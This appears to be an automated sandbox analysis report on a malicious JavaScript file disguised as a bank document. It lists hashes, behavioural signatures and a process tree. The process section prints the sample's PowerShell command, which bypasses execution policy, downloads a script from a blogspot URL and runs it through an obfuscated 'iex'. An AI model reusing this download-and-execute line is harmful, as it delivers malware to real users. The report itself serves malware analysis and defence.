Analysis
- max time kernel: 121s
- max time network: 124s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- submitted: 16-01-2024 10:45
Static task
- static1
Behavioral tasks
- behavioral1: Sample New_ScanDoc#092387CHASEeAdvice.js, Resource win7-20231215-en
- behavioral2: Sample New_ScanDoc#092387CHASEeAdvice.js, Resource win10-20231215-en
- behavioral3: Sample New_ScanDoc#092387CHASEeAdvice.js, Resource win10v2004-20231215-en
- behavioral4: Sample New_ScanDoc#092387CHASEeAdvice.js, Resource win11-20231222-en
General
- Target: New_ScanDoc#092387CHASEeAdvice.js
- Size: 1.4MB
- MD5: 286d534eb759c671fa9e79cfafd3bc85
- SHA1: d165938c1c607618c5cb6d9d11cf5b371f007ac7
- SHA256: 77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
- SHA512: 3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
- SSDEEP: 192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
- Deletes itself (1 IoCs)
  Processes: wscript.exe (PID 2172)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes: powershell.exe (PID 2232)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: powershell.exe (PID 2232), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: wscript.exe (PID 2172) wrote to the memory of powershell.exe (PID 2232); the same source/target pair is recorded three times
Processes
1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js
   - Deletes itself
   - Suspicious use of WriteProcessMemory
2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of process 1)
   Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 6
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- memory/2232-4-0x000000001B210000-0x000000001B4F2000-memory.dmp (2.9MB)
- memory/2232-5-0x0000000002410000-0x0000000002418000-memory.dmp (32KB)
- memory/2232-6-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp (9.6MB)
- memory/2232-7-0x00000000025E0000-0x0000000002660000-memory.dmp (512KB)
- memory/2232-8-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp (9.6MB)
- memory/2232-11-0x00000000025E0000-0x0000000002660000-memory.dmp (512KB)
- memory/2232-10-0x00000000025E0000-0x0000000002660000-memory.dmp (512KB)
- memory/2232-9-0x00000000025E0000-0x0000000002660000-memory.dmp (512KB)
- memory/2232-12-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp (9.6MB)